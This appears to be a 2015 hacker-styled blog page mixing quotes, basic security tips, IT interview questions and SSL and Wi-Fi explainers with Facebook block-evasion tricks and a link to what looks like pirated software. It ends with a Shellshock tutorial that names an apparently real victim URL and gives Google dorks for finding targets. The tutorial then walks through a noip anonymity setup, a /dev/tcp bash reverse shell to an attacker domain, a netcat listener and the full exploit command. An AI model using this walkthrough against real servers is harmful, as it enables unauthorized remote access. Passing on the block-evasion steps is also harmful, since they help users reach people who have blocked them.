The Unknowns

07/08/2015

05/07/2015

30/04/2015

08/03/2015

"Do not argue with an idiot. He will drag you down to his level and beat you with experience"
Good artists copy, great artists steal.
Pablo Picasso
Ignorance is the curse of God; knowledge is the wing wherewith we fly to heaven.
William Shakespeare
Change your thoughts and you change your world.Nothing Is Impossible
We can't help everyone, but everyone can help someone.
Ronald Reagan
Every king was once a crying baby and Every great building was once a map. It’s not important where you are TODAY, BUT where you will reach TOMORROW.
Every Expert Was Once a Beginner
I've failed over and over and over again in my life and that is why I succeed.
Michael Jordan

08/03/2015

# Tips to be Secure #
1.) Be careful what you download. Install Softwares only from trusted sources, either Desktops or Mobile apps.
2.) Don’t Ignore operating system update or Software update message notifications and update as soon as you can.
3.) Do not click anything available in front of you, first review what you are going to open and Why ?
4.) One way to clean your computer is to scan it with at least one high-quality antivirus Software.
5.) Don't share your personal Information on Social Networking sites.

08/03/2015

Top Interview Questions for IT Pro
1. What is the difference between a hub and a switch?
2. What is a network?
3. What is Active Directory?
4. What is TCP/IP and what does it stand for?
5. What is a default gateway?
6. What does DHCP stand for?
7. What is an IP Address?
8. What is the significance of the IP address 255.255.255.255?
9. What are the 3 major classes of an IP network?
10. What is a Class D IP address?
11. What is OSPF?
12. A user is complaining of delays when using the network. What would you do?
Network Administrator Positions
Some of these questions may also be included in the previous category for Help Desk Technician positions. In either case, they’re worth preparing for.
13. What is the difference between layer 2 and layer 3 in the OSI model?
14. What is the difference between a hub, switch, and router?
15. What is a VLAN?
16. What is the difference between TCP and UDP?
17. How do you distinguish a DNS problem from a network problem?
18. What are a runt, Giant, and collision?
19. What is a broadcast storm?
20. What is the purpose of VRRP?
21. What is a VPN?
22. What is a default route?
23. How do you set a default route on an IOS Cisco router?
24. What is a metric?
25. What is a MAC address?
26. What is ARP/RARP?
27. Describe a TCP connection sequence.
28. What is MTU?
29. What other TCP setting can you modify besides MTU to shorten packets?
System Administration Position
Here are a few more questions that are a little bit more difficult. System Admins should know all these answers by heart in addition to the Network Administrator questions.
30. What is the difference between layer 2 and layer 3 devices?
31. What is the subnet for a class C network?
32. Have you configured a NIS server/client before? If so, describe what you did.
33. Have your configured a NFS server?
34. What are RAID 1 and RAID 5?
35. What are the required components of Windows Server 2003 for installing Exchange 2003?
36. What must be done to an AD forest before Exchange can be deployed?
37. What Exchange process is responsible for communication with AD?
38. What connector type would you use to connect to the Internet, and what are the two methods of sending mail over that connector?
39. How would you optimize Exchange 2003 memory usage on Windows Server 2003 with more than 1Gb of memory?
40. What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
41. Name the process names for the following: System Attendant, Information Store, SMTP/POP/IMAP/OWA.
42. What is the maximum amount of databases that can be hosted on Exchange 2003 Enterprise?
43. What are the disadvantages of circular logging?
44. >What is Active Directory schema?
45. What are the domain functional levels in Windows Server 2003?
46. What is the default domain functional level in Windows Server 2003?
47. What are the forest functional levels in Windows Server 2003?
48. What is a global catalog server?
49. How can we raise domain functional and forest functional levels in Windows Server 2003?
50. What is the default protocol used in directory services?
51. What is IPv6?
52. What are the physical & logical components of ADS?
53. In which domain functional level, we can rename a domain name?
54. What is multimaster replication?
55. What is a site?
56. Which is the command used to remove active directory from a domain controller?
57. What is the file that’s responsible for keeping all Active Directory databases?
General HR Questions
These general questions can be the toughest ones to get through. They might sound easy, but they require a lot of thought and preparation. I would suggest writing down your answers first, then reading them over a few times so that you’re comfortable in answering them.
Some of these questions are very tricky and can get you in trouble. So if you run into problems finding a good answer, check out these 64 Interview Questions for some help.
58. Tell us a little bit about yourself.
59. What are your greatest strengths?
60. What are your greatest weaknesses?
61. What do you like about your current job or what did you like about your last job?
62. Give us an example of when you handled a stressful situation.
62. Give us an example of one of the toughest problems you had to face, and how did you deal with it?
63. Why do you think you should get this position?
64. Do you think you are the best person for this job? If so, why?
65. Why did you apply for this position?
66. Why did you apply for a position with our company and what do you know about us?
67. Why should we hire you?
68. Tell us about your short and long term goals?
69. Where do you see yourself five years from now?
70. Please explain, what does customer service mean to you?
71. What does being a team player mean to you?
72. Give us an example of how you handled a conflict with another employee?
73. What are your salary expectations?
74. What would you consider your most important accomplishment?
75. How would you define success?
76. At your last review, what improvements did your manager suggest you make?
77. What would your co workers say about you?
May this Helpful

08/03/2015

SSL (Secure Sockets Layer)
SSL (Secure Sockets Layer) is a standard security technology for establishing an encrypted link between a server and a client—typically a web server (website) and a browser; or a mail server and a mail client (e.g., Outlook).
SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text—leaving you vulnerable to eavesdropping. If an attacker is able to intercept all data being sent between a browser and a web server they can see and use that information.
More specifically, SSL is a security protocol. Protocols describe how algorithms should be used; in this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.
SSL secures millions of peoples’ data on the Internet every day, especially during online transactions or when transmitting confidential information. Internet users have come to associate their online security with the lock icon that comes with an SSL-secured website or green address bar that comes with an extended validation SSL-secured website. SSL-secured websites also begin with https rather than http.
Where Do Certificates Come In?
All browsers have the capability to interact with secured web servers using the SSL protocol. However, the browser and the server need what is called an SSL Certificate to be able to establish a secure connection.

08/03/2015

Secure Wireless Network part 1
Threats to Wi-Fi Implementations
Radio waves can pe*****te through walls there is a great chance of unauthorized access to the network and data. Because of its broadcasting nature, anybody can sniff the network for valuable credentials. If the network is not properly secured the attacker will get sufficient data to launch an attack.
In brief the following cases may happen.
i) The attacker may search for available wireless networks in the close proximity. If the Access Point( AP) is open the attacker can avail the network without any effort.
ii) The attacker can directly log in to the Access Point using default credentials and configure the device in whatever way he wants.
iii) The attacker can sniff the network for configuration details such as SSID(Service Set Identifier) , BSSID(Basic Service Set Identification ), encryption used, channel used etc. He can capture sufficient packets to launch an attack.
iv) The attacker can install a fake Access Point and lure(like advertising free internet access) users to connect to the rogue AP.
v) The attacker can disrupt the normal functioning of the network.
Securing AP/ Router
As far as a user is concerned, securing Access Point ensures the primary level of security. In this document configuration settings of an AP/Router that is installed in a typical home network is discussed.
1. Change Administrator Password
An attacker can easily find out the default password. It must be changed. Ensure that the admin password is strong enough.
2. Prefer Wi-Fi Protected Access(WPA2 Preferably) instead of Wired Equivalent Privacy(WEP).
WPA’s salient features are strong encryption algorithm, user authentication and support for IEEE 802.1X . Use Wi-Fi Protected Access (WPA) or WPA2 with Pre-Shared Key (PSK) authentication and AES as the encryption standard. The pass phrase should be strong enough.
3. MAC Address Filtering
Access of the clients can be permitted or prevented by providing a list of MAC Addresses in the “MAC Address filter” configuration parameter. This is known as MAC Address filtering. Together with SSID this can also used as a security measure. Select the MAC Address of all the wireless Network interface cards used in the network. The list can be used to permit or prevent the wireless access .

05/02/2015

How to Send Friend Request In Facebook When Blocked

Steps 1

Goto notepad.

Step 2

Add that email which you wTanna send request on facebook, you can add more then one email separated by commas ( , )
12980_544340245587840_644481525_n
Step 3

To Make a contact file Save this notepad with .vcf
12980_544340245587840_644481525_n
Step 4

Now jump Here
Step 5

Click On the Other Tools TAB
12980_544340245587840_644481525_n
Step 6

Now Upload Via Contact File
12980_544340245587840_644481525_n
Now Facebook will promote your friend request. Click ‘OK’ and that’s it, you’re done

05/02/2015

Latest IDm manager link

HAve been updated

Download it


https://drive.google.com/…/0B7ax-h7o4vjiUHNBckppUVNQM…/view…

passs = "1 " without ""

Get access to files anywhere through secure cloud storage and file backup for your photos, videos, files and more with Google Drive.

31/01/2015

SEND MESSAGE EVEN IF YOU ARE
BLOCKED ON FACEBOOK
Step 1:Copy fb email of that person
whom u want to message...
Step 2:Open your email from which
u had done sign up on fb...
Step 3:Click Compose new mail...
Step 4:Enter the id which u
copied...
Step 5:In content box type your
message...
Step 6:Click send...
Step 7:Now u have successfully sent
the message from your fb id to that
person who blocked you...
# AwanHaxor

28/01/2015

Simple Shell Shock (Bash) Tut Hope
you will Learn
Who is vulnerable to shell-shock??:
CGI scripts using bash variables or
commands and CGI scripts written in
bash can be exploited remotely.
Moreover, any service listing on a port
and using bash script or its variables in
its coding can also be exploited using
this vulnerability.
Requirements:
1- Shell-shock vulnerable victim
2- Router or USB modem having port
forwarding Feature
3- Download exploit for shellshock from
here
4- Netcat
5- PHP
Google Dorks:
We can find our vulnerable victim using
google dorks. Mostly, all cgi scripts
written in bash uses a .sh file extension.
So, following google dorks can given you
good results.
inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi
Vulnerable Victim:
In our tutorial victim is following
domain:
http://supreme.adisseolabservice.com/
cgi-bin/wslb.sh
Port Forwarding:
Open your router or usb modem settings
and forward port 4444 for your LAN IP.
noip Domain for anonymity:
This step is optional and it just provides
a little bit more anonymity in our
pe*******on testing scenario.
1- Visit noip.com and register an
account.
2- Now go in your account and go in
Manager Hosts. There add free domain
name with your public IP.
This setting will take almost 1 minute to
apply. After one minute you can ping
your domain name and can verify that it
is resolving to your public IP. Now we
will use this domain name for our
reverse shell.
Here i have registered a domain logon
[dot]myftp[dot]org for getting a reverse
shell.
So lets perform it.
/dev/tcp Linux Native Reverse Shell:
We will try to use the /dev/tcp for
reverse shell because every linux system
have it.
/bin/bash -i >& /dev/tcp/logon[dot]myftp
[dot]org/4444 0>&1
OR
/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/
4444 0>&1
NOTE: forward your port 4444 for your
LAN IP otherwise it won't work for you.
Verification of vulnerable victim:
Open CMD and go in the directory where
you downloaded the exploit from exploit-
db.
Now type following command to run this
exploit.
php bash_mod_cgi_script.php
It will show u an out saying that give me
url and command.
So use the above given URL of victim and
try to use any linux system command i.e.
ls, whoami etc.
If you see command sent to server then
it means server is receiving our
command but it can't send back any
response.
shellshock vulnerable response
So, lets try to do a work around and get
a reverse shell.
Netcat Reverse Shell Handler:
Now we need to run netcat listening on
a port so that we may get a reverse
shell.So, start a netcat listening on ur
system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more
information
-l is for listening with netcat
-p is used for a custom port on which we
want to listen
Now we are all set, just run the following
command and wait untill you receive a
reverse shell on your netcat reverse
handler.
php bash_mod_cgi_script.php -u http://
supreme.adisseolabservice.com/cgi-bin/
wslb.sh -c "/bin/bash -i >& /dev/tcp/
logon[dot]myftp[dot]org/4444 0>&1"